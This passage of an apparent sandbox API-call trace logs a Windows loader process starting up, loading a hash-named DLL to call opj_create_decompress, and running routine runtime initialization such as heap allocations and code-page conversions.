!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0126.099] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100) returned 0x532b80 [0126.099] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0126.099] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x17e) returned 0x529640 [0126.099] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0126.099] GetLastError () returned 0x0 [0126.099] SetLastError (dwErrCode=0x0) [0126.099] GetEnvironmentStringsW () returned 0x534d20* [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x9cc) returned 0x535700 [0126.100] FreeEnvironmentStringsW (penv=0x534d20) returned 1 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x118) returned 0x529a70 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3e) returned 0x531440 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x5c) returned 0x520780 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x62) returned 0x5247a0 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x78) returned 0x52c290 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x62) returned 0x5255e0 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x28) returned 0x52b370 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x48) returned 0x5311c0 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1a) returned 0x52b130 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3a) returned 0x531120 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x62) returned 0x524510 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2a) returned 0x52e040 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2e) returned 0x52e200 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1c) returned 0x52b340 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xd2) returned 0x525870 [0126.100] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x7c) returned 0x524000 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3a) returned 0x530cc0 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x90) returned 0x523c20 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x24) returned 0x52b3a0 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x30) returned 0x52e140 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x36) returned 0x52e240 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3c) returned 0x5309f0 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x52) returned 0x528e60 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3c) returned 0x530950 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xd6) returned 0x5251b0 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2e) returned 0x52e5c0 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1e) returned 0x52b3d0 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2c) returned 0x52e440 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x54) returned 0x528fe0 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x52) returned 0x5290a0 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x24) returned 0x52b100 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x42) returned 0x530720 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2c) returned 0x52e080 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x44) returned 0x530680 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x24) returned 0x52b460 [0126.101] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535700 | out: hHeap=0x520000) returned 1 [0126.101] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1000) returned 0x534d20 [0126.101] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0126.101] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0126.101] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_decompress" [0126.102] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_decompress", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x529310*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0126.102] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0126.106] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0126.107] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0126.107] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0126.107] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0126.107] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0126.108] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0126.108] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0126.108] GetProcessHeap () returned 0x520000 [0126.108] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0126.108] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0126.109] GetLastError () returned 0x0 [0126.109] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0126.109] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0126.109] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3c8) returned 0x5361b0 [0126.109] SetLastError (dwErrCode=0x0) [0126.109] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1200) returned 0x536580 [0126.111] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0126.111] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0126.111] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0126.111] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0126.112] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_decompress" [0126.112] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_decompress" [0126.112] GetACP () returned 0x4e4 [0126.112] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x228) returned 0x52a840 [0126.112] IsValidCodePage (CodePage=0x4e4) returned 1 [0126.112] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0126.112] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0126.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0126.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0126.112] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0126.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0126.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0126.112] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0126.113] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0126.113] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0126.113] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0126.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0126.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0126.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0126.113] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0126.113] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0126.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0126.113] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0126.113] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1000) returned 0x537790 [0126.114] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0126.114] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0126.114] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0126.114] AreFileApisANSI () returned 1 [0126.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0126.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, 